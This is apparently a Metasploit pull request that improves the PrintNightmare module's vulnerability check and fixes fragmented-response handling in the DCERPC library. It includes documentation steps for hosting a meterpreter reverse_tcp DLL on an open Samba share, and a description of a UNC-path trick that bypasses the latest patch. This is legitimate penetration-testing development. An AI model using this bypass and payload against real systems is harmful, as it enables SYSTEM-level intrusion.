### PR TITLE
Improved PrintNightmare Check and DCERPC Library Bug Fixes

### DIFF
--- a/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md
@@ -66,6 +66,9 @@ due to how these payloads are synchronized. If the session closes, dies, or the 
 DLL can be used again otherwise a new DLL will need to be created for each simultaneously active session. One DLL can
 however be used to establish multiple sessions simultaneously so long as each session is on a different target.
 
+If this value is a UNC path, it will automatically be converted to use the `\??\UNC\` prefix instead of `\\` to bypass
+the path check in certain scenarios.
+
 ### ReconnectDelay
 *This is an advanced option.*
 

--- a/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md
@@ -15,14 +15,17 @@ request, resulting in remote code execution as NT AUTHORITY\SYSTEM.
     1. `sudo cp -pf /etc/samba/smb.conf /etc/samba/smb.conf.bak` to backup your existing config.
     1. `sudo mkdir /var/public`
     1. Add the following into the end of the `/etc/samba/smb.conf` file:
-       ```
-       [public]
-	    comment = Public Directories
-	    path = /var/public
-	    guest ok = Yes
-       ```
+    
+        ```
+        [public]
+        comment = Public Directories
+        path = /var/public
+        guest ok = Yes
+        ```
+       
     1. Restart Samba with `sudo service smbd restart`.
 1. Generate your DLL and place the file under `/var/public`.
+
     ```
     msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > use payload/windows/x64/meterpreter/reverse_tcp
     msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
@@ -47,6 +50,7 @@ request, resulting in remote code execution as NT AUTHORITY\SYSTEM.
     [*] Writing 8704 bytes to /home/gwillcox/payload.dll...
     msf6 payload(windows/x64/meterpreter/reverse_tcp) > sudo mv /home/gwillcox/payload.dll /var/public/payload.dll
     ```
+
 1. Exploit the vulnerability to force the target to load the DLL payload
     1. From msfconsole
     1. Do: `use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare`

--- a/lib/rex/proto/dcerpc/response.rb
+++ b/lib/rex/proto/dcerpc/response.rb
@@ -13,6 +13,9 @@ class Response
   attr_accessor :alloc_hint, :context_id, :cancel_cnt, :status, :stub_data
   attr_accessor :raw
 
+  FLAG_FIRST_FRAG = 1 << 0
+  FLAG_LAST_FRAG = 1 << 1
+
   # Create a new DCERPC::Response object
   # This can be initialized in two ways:
   # 1) Call .new() with the first 10 bytes of packet, then call parse on the rest
@@ -141,13 +144,14 @@ class Response
       self.context_id,
       self.cancel_cnt = data.unpack('CCCCNvvVVvC')
 
+      stub_offset = 24
       # Error out if the whole header was not read
       if !(self.alloc_hint and self.context_id and self.cancel_cnt)
         raise Rex::Proto::DCERPC::Exceptions::InvalidPacket, 'DCERPC response packet is incomplete'
       end
 
       # Put the application data into self.stub_data
-      self.stub_data = data[data.length - self.alloc_hint, 0xffff]
+      self.stub_data = data[stub_offset..self.frag_len - self.auth_len]
       # End of RESPONSE
     end
 
@@ -170,7 +174,7 @@ class Response
       self.status = data.unpack('CCCCNvvVVvCCV')
 
       # Put the application data into self.stub_data
-      self.stub_data = data[data.length - self.alloc_hint, 0xffff]
+      self.stub_data = data[stub_offset..self.frag_len - self.auth_len]
       # End of FAULT
     end
 

--- a/lib/rex/proto/dcerpc/response.rb
+++ b/lib/rex/proto/dcerpc/response.rb
@@ -50,7 +50,6 @@ class Response
     uuid = Rex::Proto::DCERPC::UUID
     data = self.raw
 
-
     if(not data)
       raise Rex::Proto::DCERPC::Exceptions::InvalidPacket, 'DCERPC response packet is incomplete'
     end
@@ -174,7 +173,7 @@ class Response
       self.status = data.unpack('CCCCNvvVVvCCV')
 
       # Put the application data into self.stub_data
-      self.stub_data = data[stub_offset..self.frag_len - self.auth_len]
+      self.stub_data = data[data.length - self.alloc_hint, 0xffff]
       # End of FAULT
     end
 

--- a/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb
+++ b/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb
@@ -264,8 +264,8 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'Notes' => {
           'AKA' => [ 'PrintNightmare' ],
-          'Stability' => [CRASH_SAFE],
-          'Reliability' => [],
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [UNRELIABLE_SESSION],
           'SideEffects' => [
             ARTIFACTS_ON_DISK # the dll will be copied to the remote server
           ]

--- a/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb
+++ b/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb
@@ -240,7 +240,7 @@ class MetasploitModule < Msf::Auxiliary
         'Name' => 'Print Spooler Remote DLL Injection',
         'Description' => %q{
           The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted
-          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This modules uses the MS-RPRN
+          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN
           vector which requires the Print Spooler service to be running.
         },
         'Author' => [

--- a/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb
+++ b/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb
@@ -309,7 +309,6 @@ class MetasploitModule < Msf::Auxiliary
       end
       return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).")
     end
-    vprint_status("Bound to #{handle} ...")
 
     arch = dcerpc_getarch
     # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43


### PR DESCRIPTION
This PR makes a couple of improvements to the PrintNightmare module, most notably an enhanced check method that will actually determine vulnerability instead of just detecting the service. The updates will also automatically convert UNC paths into the `\??\UNC\host\path\to\dll` format that's necessary to bypass the second (most recent as of the time of this writing) patch. I tested this on a Server 2016 and Server 2019 instances, and in both cases the bypass path format works regardless of the patch level making it the most reliable way to exploit the vulnerability.

This also fixes a bug in the DCERPC library where data that was read would be incomplete when the response would not fit into a single fragment. Basically the DCERPC read method would only read one fragment, so I updated it to read until the last fragment flag is specified. This fixed a stack trace that would occur when running the PrintNightmare module as it was enumerating the installed print drivers because the response from the server can be quite large. I had to update the logic that's used to determine the boundaries of the stub data because it was broken when the data was fragmented. I copied the logic from [RubySMB's](https://github.com/rapid7/ruby_smb/blob/53e4855b76a63f9ded497182b07a9181b820a925/lib/ruby_smb/dcerpc/response.rb#L15) implementation. I briefly looked at converting the DCERPC to just use RubySMB's DCERPC response definition but because the `#last_response` is used in a few places I decided not to.

<details>
<summary>Stack Trace</summary>

```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > check

[*] 192.168.159.40:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Target environment: Windows v10.0.14393 (x64)
[*] 192.168.159.40:445 - Enumerating the installed printer drivers...
[-] 192.168.159.40:445 - Auxiliary failed: EOFError End of file reached
[-] 192.168.159.40:445 - Call stack:
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/io.rb:316:in `read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/io.rb:278:in `readbytes'
[-] 192.168.159.40:445 -   (eval):23:in `read_and_return_value'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base_primitive.rb:129:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/array.rb:305:in `block in do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/array.rb:303:in `loop'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/array.rb:303:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `block in do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `each'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/primitive.rb:116:in `read_and_return_value'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base_primitive.rb:129:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/ruby_smb-2.0.10/lib/ruby_smb/dcerpc/ndr.rb:227:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `block in do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `each'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/struct.rb:139:in `do_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:147:in `block in read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:253:in `start_read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:145:in `read'
[-] 192.168.159.40:445 -   /home/smcintyre/.rvm/gems/ruby-2.7.2/gems/bindata-2.4.10/lib/bindata/base.rb:21:in `read'
[-] 192.168.159.40:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb:464:in `rprn_call'
[-] 192.168.159.40:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb:406:in `enum_printer_drivers'
[-] 192.168.159.40:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb:327:in `check'
[-] 192.168.159.40:445 - Check failed: The state could not be determined.
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) >
```
</details>

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare`
- [x] Run the check method against a vulnerable target
- [x] See that it's reported as vulnerable, not just detected
- [ ] Run the exploit, see that it still works with the new path conversion
- [ ] Update the target version of Windows with all patches, leave Point and Print off (this is the default value)
- [ ] Run the check method again and see that the target is reported as not-vulnerable

## Demo

In this example 192.168.159.96 is a fully patched Server 2019 instance and 192.168.159.40 is an unpatched Server 2016 instance.

```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > check 192.168.159.96 192.168.159.40

[*] 192.168.159.96:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.96[\spoolss] ...
[*] 192.168.159.96:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.159.96:445 - Enumerating the installed printer drivers...
[*] 192.168.159.96:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL
[*] 192.168.159.96:445 - Retrieving the path of the printer driver directory...
[*] 192.168.159.96:445 - Using driver directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.159.96:445 - RpcAddPrinterDriverEx response 5 ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.96:445 - The target is not exploitable. Received ERROR_ACCESS_DENIED implying the target is patched.
[*] 192.168.159.40:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.159.40[\spoolss] ...
[*] 192.168.159.40:445 - Target environment: Windows v10.0.14393 (x64)
[*] 192.168.159.40:445 - Enumerating the installed printer drivers...
[*] 192.168.159.40:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_dcef07064d319714\Amd64\UNIDRV.DLL
[*] 192.168.159.40:445 - Retrieving the path of the printer driver directory...
[*] 192.168.159.40:445 - Using driver directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.159.40:445 - RpcAddPrinterDriverEx response 67 ERROR_BAD_NET_NAME (The network name cannot be found.)
[+] 192.168.159.40:445 - The target is vulnerable. Received ERROR_BAD_NET_NAME, implying the target is vulnerable.
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) >
```

